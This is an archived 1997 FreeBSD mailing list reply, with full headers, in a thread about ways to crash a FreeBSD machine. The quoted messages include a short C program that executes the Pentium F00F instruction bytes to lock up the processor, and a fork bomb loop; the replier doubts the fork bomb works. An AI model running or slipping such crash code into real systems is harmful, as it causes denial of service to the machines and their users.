From owner-freebsd-questions Mon Nov 10 09:15:41 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id JAA12242 for questions-outgoing; Mon, 10 Nov 1997 09:15:41 -0800 (PST) (envelope-from owner-freebsd-questions) Received: from elvis.vnet.net (elvis.vnet.net [166.82.1.5]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id JAA12212 for ; Mon, 10 Nov 1997 09:15:16 -0800 (PST) (envelope-from rivers@dignus.com) Received: from ponds.dignus.com (ponds.vnet.net [166.82.177.48]) by elvis.vnet.net (8.8.5/8.8.4) with ESMTP id MAA23266; Mon, 10 Nov 1997 12:15:00 -0500 (EST) Received: from lakes.dignus.com (lakes [10.0.0.3]) by ponds.dignus.com (8.8.5/8.8.5) with ESMTP id IAA15637; Mon, 10 Nov 1997 08:57:23 -0500 (EST) Received: (from rivers@localhost) by lakes.dignus.com (8.8.7/8.6.9) id IAA10117; Mon, 10 Nov 1997 08:45:54 -0500 (EST) Date: Mon, 10 Nov 1997 08:45:54 -0500 (EST) From: Thomas David Rivers Message-Id: <199711101345.IAA10117@lakes.dignus.com> To: freebsd-questions@freebsd.org, sporkl@dti.net Subject: Re: Crashing FreeBSD Sender: owner-freebsd-questions@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > Well, there are other ways too. > > 1. Toggle power really fast > 2. write a "forkbomb": > #include > > main() { > > for(;;) {fork();} > } > > I am sure there are other ways. I'm pretty sure a 'forkbomb' will not crash FreeBSD. Did you try it :-) - Dave Rivers - > > > > > -Spike Gronim > sporkl@dti.net > > "Tradition is the chastity belt of the mind" > > > > On Sun, 9 Nov 1997, Michael Richards wrote: > > > Well folks, it looks like anyone can crash a FreeBSD box. I am told that > > this is a bug in the pentium processor. Compile and run, it will crash the > > machine right away... > > > > Very simple: > > > > > > char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; > > > > main () { > > void (*f)() = x; > > f(); > > } > > > > > >